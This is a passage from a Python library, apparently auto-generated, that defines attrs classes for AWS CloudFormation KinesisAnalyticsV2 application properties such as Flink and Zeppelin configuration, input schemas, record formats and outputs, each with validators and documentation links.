    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-jsonmappingparameters"""
@attr.s
class PropApplicationFlinkApplicationConfiguration(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. All attributes are optional nested property objects (``p_`` prefix;
    validators wrapped in ``optional`` and accept None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.FlinkApplicationConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html
    Property Document:
    - ``p_CheckpointConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-checkpointconfiguration
    - ``p_MonitoringConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-monitoringconfiguration
    - ``p_ParallelismConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-parallelismconfiguration
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.FlinkApplicationConfiguration"
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_CheckpointConfiguration: typing.Union['PropApplicationCheckpointConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationCheckpointConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCheckpointConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "CheckpointConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-checkpointconfiguration"""
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_MonitoringConfiguration: typing.Union['PropApplicationMonitoringConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationMonitoringConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationMonitoringConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "MonitoringConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-monitoringconfiguration"""
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_ParallelismConfiguration: typing.Union['PropApplicationParallelismConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationParallelismConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationParallelismConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "ParallelismConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-parallelismconfiguration"""
@attr.s
class PropApplicationOutputOutput(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.Output"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html
    Property Document:
    
    - ``rp_DestinationSchema``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-destinationschema
    - ``p_KinesisFirehoseOutput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisfirehoseoutput
    - ``p_KinesisStreamsOutput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisstreamsoutput
    - ``p_LambdaOutput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-lambdaoutput
    - ``p_Name``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-name
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.Output"
    # Required ("rp_" prefix): validator is not wrapped in optional(), so the
    # default of None fails validation unless the caller supplies a value.
    # A plain dict is coerced to the Prop class via the from_dict converter.
    rp_DestinationSchema: typing.Union['PropApplicationOutputDestinationSchema', dict] = attr.ib(
        default=None,
        converter=PropApplicationOutputDestinationSchema.from_dict,
        validator=attr.validators.instance_of(PropApplicationOutputDestinationSchema),
        metadata={AttrMeta.PROPERTY_NAME: "DestinationSchema"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-destinationschema"""
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_KinesisFirehoseOutput: typing.Union['PropApplicationOutputKinesisFirehoseOutput', dict] = attr.ib(
        default=None,
        converter=PropApplicationOutputKinesisFirehoseOutput.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationOutputKinesisFirehoseOutput)),
        metadata={AttrMeta.PROPERTY_NAME: "KinesisFirehoseOutput"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisfirehoseoutput"""
    # Optional: Kinesis Data Streams destination for the application output.
    p_KinesisStreamsOutput: typing.Union['PropApplicationOutputKinesisStreamsOutput', dict] = attr.ib(
        default=None,
        converter=PropApplicationOutputKinesisStreamsOutput.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationOutputKinesisStreamsOutput)),
        metadata={AttrMeta.PROPERTY_NAME: "KinesisStreamsOutput"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisstreamsoutput"""
    # Optional: Lambda function destination for the application output.
    p_LambdaOutput: typing.Union['PropApplicationOutputLambdaOutput', dict] = attr.ib(
        default=None,
        converter=PropApplicationOutputLambdaOutput.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationOutputLambdaOutput)),
        metadata={AttrMeta.PROPERTY_NAME: "LambdaOutput"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-lambdaoutput"""
    # Optional: in-application stream name; intrinsic functions (e.g. Ref) are
    # allowed via the TypeHint/TypeCheck intrinsic-string types.
    p_Name: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "Name"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-name"""
@attr.s
class PropApplicationInputProcessingConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputProcessingConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputprocessingconfiguration.html
    Property Document:
    
    - ``p_InputLambdaProcessor``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputprocessingconfiguration.html#cfn-kinesisanalyticsv2-application-inputprocessingconfiguration-inputlambdaprocessor
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputProcessingConfiguration"
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_InputLambdaProcessor: typing.Union['PropApplicationInputLambdaProcessor', dict] = attr.ib(
        default=None,
        converter=PropApplicationInputLambdaProcessor.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationInputLambdaProcessor)),
        metadata={AttrMeta.PROPERTY_NAME: "InputLambdaProcessor"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputprocessingconfiguration.html#cfn-kinesisanalyticsv2-application-inputprocessingconfiguration-inputlambdaprocessor"""
@attr.s
class PropApplicationApplicationCodeConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ApplicationCodeConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html
    Property Document:
    
    - ``rp_CodeContent``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontent
    - ``rp_CodeContentType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontenttype
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ApplicationCodeConfiguration"
    # Required ("rp_" prefix): validator is not wrapped in optional(), so the
    # default of None fails validation unless the caller supplies a value.
    rp_CodeContent: typing.Union['PropApplicationCodeContent', dict] = attr.ib(
        default=None,
        converter=PropApplicationCodeContent.from_dict,
        validator=attr.validators.instance_of(PropApplicationCodeContent),
        metadata={AttrMeta.PROPERTY_NAME: "CodeContent"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontent"""
    # Required: intrinsic functions (e.g. Ref) are allowed via the
    # TypeHint/TypeCheck intrinsic-string types.
    rp_CodeContentType: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "CodeContentType"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontenttype"""
@attr.s
class PropApplicationZeppelinApplicationConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ZeppelinApplicationConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html
    Property Document:
    
    - ``p_CatalogConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-catalogconfiguration
    - ``p_CustomArtifactsConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-customartifactsconfiguration
    - ``p_DeployAsApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-deployasapplicationconfiguration
    - ``p_MonitoringConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-monitoringconfiguration
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ZeppelinApplicationConfiguration"
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_CatalogConfiguration: typing.Union['PropApplicationCatalogConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationCatalogConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCatalogConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "CatalogConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-catalogconfiguration"""
    p_CustomArtifactsConfiguration: typing.Union['PropApplicationCustomArtifactsConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationCustomArtifactsConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCustomArtifactsConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "CustomArtifactsConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-customartifactsconfiguration"""
    p_DeployAsApplicationConfiguration: typing.Union['PropApplicationDeployAsApplicationConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationDeployAsApplicationConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationDeployAsApplicationConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "DeployAsApplicationConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-deployasapplicationconfiguration"""
    # NOTE: uses the Zeppelin-specific monitoring type, not the Flink one used
    # by FlinkApplicationConfiguration, even though the CFN name is the same.
    p_MonitoringConfiguration: typing.Union['PropApplicationZeppelinMonitoringConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationZeppelinMonitoringConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationZeppelinMonitoringConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "MonitoringConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-monitoringconfiguration"""
@attr.s
class PropApplicationReferenceDataSourceMappingParameters(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.MappingParameters"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html
    Property Document:
    
    - ``p_CSVMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-csvmappingparameters
    - ``p_JSONMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-jsonmappingparameters
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.MappingParameters"
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_CSVMappingParameters: typing.Union['PropApplicationReferenceDataSourceCSVMappingParameters', dict] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceCSVMappingParameters.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceCSVMappingParameters)),
        metadata={AttrMeta.PROPERTY_NAME: "CSVMappingParameters"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-csvmappingparameters"""
    p_JSONMappingParameters: typing.Union['PropApplicationReferenceDataSourceJSONMappingParameters', dict] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceJSONMappingParameters.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceJSONMappingParameters)),
        metadata={AttrMeta.PROPERTY_NAME: "JSONMappingParameters"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-jsonmappingparameters"""
@attr.s
class PropApplicationRecordFormat(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.RecordFormat"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html
    Property Document:
    
    - ``rp_RecordFormatType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-recordformattype
    - ``p_MappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-mappingparameters
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.RecordFormat"
    # Required ("rp_" prefix): validator is not wrapped in optional(), so the
    # default of None fails validation unless the caller supplies a value.
    rp_RecordFormatType: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RecordFormatType"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-recordformattype"""
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_MappingParameters: typing.Union['PropApplicationMappingParameters', dict] = attr.ib(
        default=None,
        converter=PropApplicationMappingParameters.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationMappingParameters)),
        metadata={AttrMeta.PROPERTY_NAME: "MappingParameters"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-mappingparameters"""
@attr.s
class PropApplicationReferenceDataSourceRecordFormat(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordFormat"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html
    Property Document:
    
    - ``rp_RecordFormatType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-recordformattype
    - ``p_MappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-mappingparameters
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordFormat"
    # Required ("rp_" prefix): validator is not wrapped in optional(), so the
    # default of None fails validation unless the caller supplies a value.
    rp_RecordFormatType: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RecordFormatType"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-recordformattype"""
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_MappingParameters: typing.Union['PropApplicationReferenceDataSourceMappingParameters', dict] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceMappingParameters.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceMappingParameters)),
        metadata={AttrMeta.PROPERTY_NAME: "MappingParameters"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-mappingparameters"""
@attr.s
class PropApplicationInputSchema(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputSchema"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html
    Property Document:
    
    - ``rp_RecordColumns``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordcolumns
    - ``rp_RecordFormat``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordformat
    - ``p_RecordEncoding``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordencoding
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputSchema"
    # Required list ("rp_" prefix): each element may be given as a dict and is
    # coerced via from_list; deep_iterable validates both the list and members.
    rp_RecordColumns: typing.List[typing.Union['PropApplicationRecordColumn', dict]] = attr.ib(
        default=None,
        converter=PropApplicationRecordColumn.from_list,
        validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationRecordColumn), iterable_validator=attr.validators.instance_of(list)),
        metadata={AttrMeta.PROPERTY_NAME: "RecordColumns"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordcolumns"""
    # Required: dict input is coerced via from_dict.
    rp_RecordFormat: typing.Union['PropApplicationRecordFormat', dict] = attr.ib(
        default=None,
        converter=PropApplicationRecordFormat.from_dict,
        validator=attr.validators.instance_of(PropApplicationRecordFormat),
        metadata={AttrMeta.PROPERTY_NAME: "RecordFormat"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordformat"""
    # Optional ("p_" prefix): intrinsic functions are allowed via the
    # TypeHint/TypeCheck intrinsic-string types.
    p_RecordEncoding: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "RecordEncoding"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordencoding"""
@attr.s
class PropApplicationReferenceDataSourceReferenceSchema(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceSchema"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html
    Property Document:
    
    - ``rp_RecordColumns``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordcolumns
    - ``rp_RecordFormat``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordformat
    - ``p_RecordEncoding``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordencoding
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceSchema"
    # Required list ("rp_" prefix): elements may be dicts, coerced via from_list;
    # deep_iterable validates both the container and each member.
    rp_RecordColumns: typing.List[typing.Union['PropApplicationReferenceDataSourceRecordColumn', dict]] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceRecordColumn.from_list,
        validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationReferenceDataSourceRecordColumn), iterable_validator=attr.validators.instance_of(list)),
        metadata={AttrMeta.PROPERTY_NAME: "RecordColumns"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordcolumns"""
    # Required: dict input is coerced via from_dict.
    rp_RecordFormat: typing.Union['PropApplicationReferenceDataSourceRecordFormat', dict] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceRecordFormat.from_dict,
        validator=attr.validators.instance_of(PropApplicationReferenceDataSourceRecordFormat),
        metadata={AttrMeta.PROPERTY_NAME: "RecordFormat"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordformat"""
    # Optional ("p_" prefix): intrinsic functions are allowed via the
    # TypeHint/TypeCheck intrinsic-string types.
    p_RecordEncoding: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "RecordEncoding"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordencoding"""
@attr.s
class PropApplicationInput(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.Input"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html
    Property Document:
    
    - ``rp_InputSchema``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputschema
    - ``rp_NamePrefix``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-nameprefix
    - ``p_InputParallelism``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputparallelism
    - ``p_InputProcessingConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputprocessingconfiguration
    - ``p_KinesisFirehoseInput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisfirehoseinput
    - ``p_KinesisStreamsInput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisstreamsinput
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.Input"
    # Required ("rp_" prefix): validator is not wrapped in optional(), so the
    # default of None fails validation unless the caller supplies a value.
    rp_InputSchema: typing.Union['PropApplicationInputSchema', dict] = attr.ib(
        default=None,
        converter=PropApplicationInputSchema.from_dict,
        validator=attr.validators.instance_of(PropApplicationInputSchema),
        metadata={AttrMeta.PROPERTY_NAME: "InputSchema"},
    )
